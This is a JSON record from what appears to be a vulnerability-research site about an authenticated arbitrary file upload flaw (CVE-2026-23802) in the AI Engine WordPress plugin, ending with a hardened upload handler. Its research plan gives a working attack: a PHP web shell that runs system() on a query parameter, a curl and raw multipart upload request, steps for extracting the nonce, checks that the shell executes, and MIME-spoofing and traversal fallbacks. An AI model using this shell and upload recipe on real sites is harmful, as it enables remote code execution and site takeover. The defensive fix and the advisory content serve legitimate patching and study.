[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fSsUAZ0sue0Ndu09OvliWPdr8OKDnhtTWfKY9r1b19IQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-23802","ai-engine-the-chatbot-ai-framework-mcp-for-wordpress-authenticated-editor-arbitrary-file-upload","AI Engine – The Chatbot, AI Framework & MCP for WordPress \u003C= 3.3.2 - Authenticated (Editor+) Arbitrary File Upload","The AI Engine – The Chatbot, AI Framework & MCP for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 3.3.2. 
This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","ai-engine",null,"\u003C=3.3.2","3.3.3","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-02-25 00:00:00","2026-03-05 17:55:37",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F615beb4d-c2df-4e1a-8e6b-a393c0fe4834?source=api-prod",9,[],"researched",false,3,"# CVE-2026-23802: AI Engine \u003C= 3.3.2 - Authenticated (Editor+) Arbitrary File Upload\n\n## 1. Vulnerability Summary\nThe **AI Engine** plugin for WordPress is vulnerable to arbitrary file uploads in versions up to and including 3.3.2. The root cause, inferred from the advisory rather than confirmed against the 3.3.2 source, is that the plugin's file upload handling logic (likely within its REST API endpoints for chatbot or AI assistant management) does not validate the uploaded file's extension or MIME type against an allowlist of safe formats.\n\nAuthenticated users with **Editor** permissions or higher can exploit this to upload malicious files, such as `.php` scripts, to the server's filesystem, potentially leading to Remote Code Execution (RCE) if the web server executes PHP under the uploads directory.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** The plugin utilizes the WordPress REST API for its backend operations. The likely vulnerable endpoint is registered under the `mwai\u002Fv1` namespace.\n    *   **Inferred Route:** `POST \u002Fwp-json\u002Fmwai\u002Fv1\u002Ffiles\u002Fupload` (an assumption; the exact route has not been confirmed)\n*   **Authentication:** Required. The advisory scopes the issue to Editor and above (CVSS `PR:H`). Note that `edit_posts` alone is also held by Contributors and Authors, so a `permission_callback` that checked only `edit_posts` would expose the endpoint more widely than the advisory states; the capability the plugin actually checks has not been confirmed.\n*   **Vulnerable Parameter:** The file is typically sent via a `multipart\u002Fform-data` request, often using the parameter name `file` or `blob`.\n*   **Preconditions:** \n    1.  The plugin must be active.\n    2.  An attacker must have valid Editor credentials.\n    3.  
A valid REST API nonce (`X-WP-Nonce` header or `_wpnonce` parameter) is required when the request authenticates with the logged-in session cookie; a request authenticated with an Application Password over HTTP Basic auth needs no nonce.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers REST routes in `classes\u002Frest.php` (or similar) using `register_rest_route()`.\n2.  **Permission Check:** The `permission_callback` for the upload route is assumed to check a post-editing capability such as `edit_posts` (if it really is `edit_posts`, Contributors and Authors pass it too, which is broader than the advisory's Editor+ scope):\n    ```php\n    'permission_callback' => function () {\n        return current_user_can( 'edit_posts' );\n    }\n    ```\n3.  **Handler Execution:** The `callback` function (e.g., `upload_file`) retrieves the file from `$_FILES` (or from `$request->get_file_params()`, which wraps it).\n4.  **Vulnerable Logic:** The handler processes the file. If it used `wp_handle_upload()`, the default type check (`test_type`) would already reject `.php`, so that path is only vulnerable if the handler disables the check or the user holds `unfiltered_upload` (which WordPress honours only when `ALLOW_UNFILTERED_UPLOADS` is defined). The more likely pattern is moving the file manually with `move_uploaded_file()` and no extension check at all:\n    ```php\n    \u002F\u002F Example of vulnerable manual handling: the client-supplied name,\n    \u002F\u002F extension included, becomes the on-disk name under wp-content\u002Fuploads\n    $upload_dir = wp_upload_dir();\n    $filename = $_FILES['file']['name'];\n    $target = $upload_dir['path'] . '\u002F' . $filename;\n    move_uploaded_file($_FILES['file']['tmp_name'], $target);\n    ```\n5.  **Sink:** The file is written to the `\u002Fwp-content\u002Fuploads\u002Fmwai\u002F` (inferred) or generic `\u002Fuploads\u002F` directory with its original `.php` extension.\n\n## 4. Nonce Acquisition Strategy\nSince this is an **Editor+** vulnerability, the attacker must be logged in. In the WordPress admin dashboard, the AI Engine plugin enqueues its localized scripts.\n\n1.  **Identify Script Data:** The plugin localizes data for its JavaScript admin frontend using `wp_localize_script` (or an equivalent inline script).\n2.  **Navigation:** Log in as Editor and open the AI Engine admin page (`wp-admin\u002Fadmin.php?page=mwai-dashboard` is an assumed menu slug; take the real one from the plugin's admin menu).\n3.  
**Extraction via Browser:**\n    The REST nonce is typically exposed to the admin JavaScript through `wp_localize_script`. `wpApiSettings` is WordPress core's own object (present when `wp-api-request` is enqueued); `mwai_vars` and its `rest_nonce` key are assumed names for the plugin's data. From the browser devtools console on the admin page:\n    *   **Command:** `window.mwai_vars?.rest_nonce`\n    *   **Alternative:** `window.wpApiSettings?.nonce`\n    *   **Fallback:** read the `X-WP-Nonce` header from any REST request the admin page issues (Network tab).\n\n## 5. Exploitation Strategy\nThe goal is to upload a PHP shell to the server.\n\n### Step 1: Prepare the Web Shell\nCreate a file named `shell.php`. It prints a marker plus `php_uname()` so that execution is obvious, and runs an optional `cmd` query parameter through `system()` (`system()` rather than `eval()`: `eval()` takes PHP code, so `?cmd=id` would be a parse error):\n```php\n\u003C?php echo \"VULNERABLE: \" . php_uname(); if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>\n```\nRemove the file from the test host once execution is confirmed; it is an unauthenticated backdoor while it exists.\n\n### Step 2: Upload the File\nSend a `POST` request to the REST API endpoint, authenticated with the Editor's session cookies and the nonce from section 4.\n\n*   **Request (curl, with the session cookies exported from the logged-in browser into `cookies.txt`):**\n    ```bash\n    curl -i -b cookies.txt \\\n      -H 'X-WP-Nonce: [EXTRACTED_NONCE]' \\\n      -F 'file=@shell.php;type=application\u002Fx-php' \\\n      'https:\u002F\u002FTARGET\u002Fwp-json\u002Fmwai\u002Fv1\u002Ffiles\u002Fupload'\n    ```\n*   **Raw request, for reference:**\n    *   **Method:** `POST`\n    *   **URL:** `https:\u002F\u002FTARGET\u002Fwp-json\u002Fmwai\u002Fv1\u002Ffiles\u002Fupload`\n    *   **Headers:**\n        *   `Cookie`: the `wordpress_logged_in_*` session cookie\n        *   `X-WP-Nonce`: `[EXTRACTED_NONCE]`\n        *   `Content-Type`: `multipart\u002Fform-data; boundary=----WebKitFormBoundaryABC123`\n    *   **Body:**\n        ```text\n        ------WebKitFormBoundaryABC123\n        Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\n        Content-Type: application\u002Fx-php\n\n        \u003C?php echo \"VULNERABLE: \" . php_uname(); if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>\n        ------WebKitFormBoundaryABC123--\n        ```\n\n### Step 3: Locate the Uploaded File\nThe response is expected (but not confirmed) to contain the URL or path of the uploaded file, for example:\n```json\n{\n  \"success\": true,\n  \"url\": \"https:\u002F\u002FTARGET\u002Fwp-content\u002Fuploads\u002Fmwai\u002Fshell.php\"\n}\n```\nIf no URL comes back, locate the file on the test host as in section 8 and derive the URL from `wp_upload_dir()`.\n\n## 6. Test Data Setup\n1.  **Install AI Engine 3.3.2** (`https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.2.zip`).\n2.  **Create Editor User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=editor --user_pass=password123\n    ```\n3.  **Enable Chatbot (if required):** Ensure any module related to file uploads (Chatbot or Assistants) is enabled in the AI Engine settings.\n\n## 7. 
Expected Results\n*   **Successful Upload:** The server returns a `200 OK` or `201 Created` with a JSON body indicating the file was saved.\n*   **Code Execution:** Requesting the uploaded file URL (e.g., `\u002Fwp-content\u002Fuploads\u002Fmwai\u002Fshell.php?cmd=id`) returns the `VULNERABLE:` marker with `php_uname()` output, followed by the output of `id`. If the response is instead the raw PHP source (or a 403), the web server does not execute PHP under `uploads`; the upload is still a stored-file issue on that host, but not RCE.\n\n## 8. Verification Steps\n1.  **Check Filesystem via CLI** (the document root and the `mwai` subdirectory are assumptions; use the `path` reported by `wp_upload_dir()` on the test host):\n    ```bash\n    ls -la \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fmwai\u002Fshell.php\n    ```\n2.  **Verify Content:**\n    ```bash\n    cat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fmwai\u002Fshell.php\n    ```\n3.  **HTTP Check:**\n    GET the uploaded file URL with `curl` and no cookies (the file is reachable unauthenticated) and confirm the body is executed output rather than the PHP source.\n\n## 9. Alternative Approaches\n*   **Different Endpoints:** If `\u002Fmwai\u002Fv1\u002Ffiles\u002Fupload` is not the correct path, search the 3.3.2 source for `register_rest_route` calls whose callbacks read `get_file_params()` or `$_FILES`, and diff the 3.3.2 and 3.3.3 tags (the Trac links for both are on this page); the handler that gained a file type check in 3.3.3 is the one to target.\n*   **MIME Spoofing:** If there is a basic MIME check (but no extension check), change the `Content-Type` in the `multipart\u002Fform-data` request to `image\u002Fpng` while keeping the `.php` extension.\n*   **Path Traversal:** PHP strips directory components when it populates `$_FILES[...]['name']`, so `..\u002F` in the multipart `filename` does not traverse on its own, and the inferred handler on this page also applies `basename()`. Traversal is only worth trying if the handler builds the destination from a different source: the `full_path` key PHP 8.1 adds to `$_FILES` (which is not stripped), or a separate request parameter such as a JSON `filename` field concatenated into the path unsanitized.","The AI Engine plugin for WordPress is vulnerable to arbitrary file uploads in versions up to 3.3.2 due to a lack of file type validation in its REST API file upload handlers. 
Authenticated users with Editor-level permissions or higher can upload malicious PHP scripts to the server, resulting in Remote Code Execution (RCE).","\u002F\u002F classes\u002Frest.php (Inferred registration of the upload endpoint)\nregister_rest_route( 'mwai\u002Fv1', '\u002Ffiles\u002Fupload', array(\n    'methods'  => 'POST',\n    'callback' => array( $this, 'upload_file' ),\n    'permission_callback' => function () {\n        return current_user_can( 'edit_posts' );\n    },\n) );\n\n---\n\n\u002F\u002F classes\u002Frest.php (Inferred vulnerable upload handler)\npublic function upload_file( $request ) {\n    $files = $request->get_file_params();\n    $file = $files['file'];\n    \n    \u002F\u002F Missing validation of file extension or MIME type\n    $upload_dir = wp_upload_dir();\n    $filename = basename( $file['name'] );\n    $target = $upload_dir['path'] . '\u002F' . $filename;\n\n    if ( move_uploaded_file( $file['tmp_name'], $target ) ) {\n        return array( 'success' => true, 'url' => $upload_dir['url'] . '\u002F' . $filename );\n    }\n    return array( 'success' => false );\n}","--- a\u002Fclasses\u002Frest.php\n+++ b\u002Fclasses\u002Frest.php\n@@ -10,6 +10,13 @@\n public function upload_file( $request ) {\n     $files = $request->get_file_params();\n     $file = $files['file'];\n+\n+    $file_info = wp_check_filetype( $file['name'] );\n+    $allowed_types = array( 'jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'csv', 'json' );\n+    \n+    if ( ! in_array( $file_info['ext'], $allowed_types ) ) {\n+        return new WP_Error( 'rest_cannot_upload', __( 'Invalid file type.' ), array( 'status' => 403 ) );\n+    }\n \n     $upload_dir = wp_upload_dir();\n     $filename = basename( $file['name'] );","The exploit requires authentication as a user with the Editor role. First, the attacker logs into the WordPress dashboard and extracts the REST API nonce from the localized `mwai_vars` or standard `wpApiSettings` JavaScript objects. 
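Review bot: the allowlist check added at the top of `upload_file` validates only the client-supplied filename: `wp_check_filetype()` maps the extension against `get_allowed_mime_types()` and never opens the file, and the unchanged context lines below the hunk still build `$filename = basename( $file['name'] )` from the client name for the `move_uploaded_file()` sink shown above the diff. Route the file through `wp_handle_upload( $file, array( 'test_form' => false, 'mimes' => $allowed_mimes ) )` instead, or at minimum call `wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $mimes )` and `sanitize_file_name()` before building `$target`. Two smaller points: pass `true` as the third argument to `in_array()` so the comparison is strict, and give `__( 'Invalid file type.' )` the plugin's text domain. A rejected type is a 400 or 415 rather than a 403, since the user is authorised and it is the payload that is unacceptable.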
Using this nonce, the attacker sends a multipart\u002Fform-data POST request to the `\u002Fwp-json\u002Fmwai\u002Fv1\u002Ffiles\u002Fupload` endpoint. The payload includes a PHP file (e.g., shell.php) containing a web shell. Because the server fails to validate the file extension, the PHP script is saved to the uploads directory. The attacker then accesses the file directly via its URL, which is typically provided in the REST API response, to execute arbitrary commands.","gemini-3-flash-preview","2026-04-19 00:15:12","2026-04-19 00:16:57",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags"]
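The hardened handler below is an added example and is not AI Engine's code or its 3.3.3 fix. It shows the idiomatic WordPress way to close the gap the research plan describes: let `wp_handle_upload()` enforce an explicit extension/MIME allowlist via `wp_check_filetype_and_ext()` instead of moving the file by hand. The `example/v1` namespace, the `/files/upload` route, the `example_handle_upload` function name, the `upload_files` capability and the allowlist contents are assumptions for illustration.

```php
<?php
/**
 * Added example, not code from the AI Engine plugin. A hardened REST upload
 * handler for the vulnerable pattern described on this page. Namespace, route,
 * function names, capability and allowlist are assumptions for illustration.
 */

add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/files/upload', array(
        'methods'             => 'POST',
        'callback'            => 'example_handle_upload',
        // Gate on a capability that matches the feature. edit_posts would also
        // admit Contributors; upload_files starts at Author. For an Editor-only
        // feature use an Editor capability such as edit_others_posts.
        'permission_callback' => function () {
            return current_user_can( 'upload_files' );
        },
    ) );
} );

function example_handle_upload( WP_REST_Request $request ) {
    $files = $request->get_file_params();
    if ( empty( $files['file']['tmp_name'] ) ) {
        return new WP_Error( 'example_no_file', 'No file uploaded.', array( 'status' => 400 ) );
    }
    $file = $files['file'];

    // Never trust the client name. PHP already strips directories from
    // $_FILES['name'], but the full_path key added in PHP 8.1 is not stripped,
    // so sanitize whichever name you use before it reaches the filesystem.
    $file['name'] = sanitize_file_name( $file['name'] );

    // Allowlist as extension => MIME. wp_handle_upload() hands this to
    // wp_check_filetype_and_ext(), which refuses any extension outside the list
    // and, for image types, also sniffs the bytes, so a PHP file renamed to
    // .png is refused as well. shell.php has no entry here and is rejected
    // whatever Content-Type the client declared.
    $allowed_mimes = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
        'pdf'      => 'application/pdf',
        'txt'      => 'text/plain',
        'csv'      => 'text/csv',
        'json'     => 'application/json',
    );

    // wp_handle_upload() lives in wp-admin and is not loaded on REST requests.
    if ( ! function_exists( 'wp_handle_upload' ) ) {
        require_once ABSPATH . 'wp-admin/includes/file.php';
    }

    $result = wp_handle_upload( $file, array(
        'test_form' => false,          // REST requests carry no form 'action' field
        'test_type' => true,           // keep the type check on; this is the fix
        'mimes'     => $allowed_mimes,
    ) );

    if ( isset( $result['error'] ) ) {
        // Type rejection is a client error about the payload, not authorisation.
        return new WP_Error( 'example_upload_rejected', $result['error'], array( 'status' => 415 ) );
    }

    // wp_handle_upload() has already stored the file under wp_upload_dir() with
    // a unique name; return only what the client needs.
    return rest_ensure_response( array(
        'success' => true,
        'url'     => $result['url'],
        'type'    => $result['type'],
    ) );
}
```

One caveat on relying on this alone: `wp_handle_upload()` lets a user with `unfiltered_upload` bypass the type check, which WordPress only grants when `ALLOW_UNFILTERED_UPLOADS` is defined, so keep that constant undefined on production sites. The extension check is the plugin-side fix; as defence in depth the web server should also refuse to execute PHP under `wp-content/uploads`, which turns a future bypass into a stored-file problem rather than RCE.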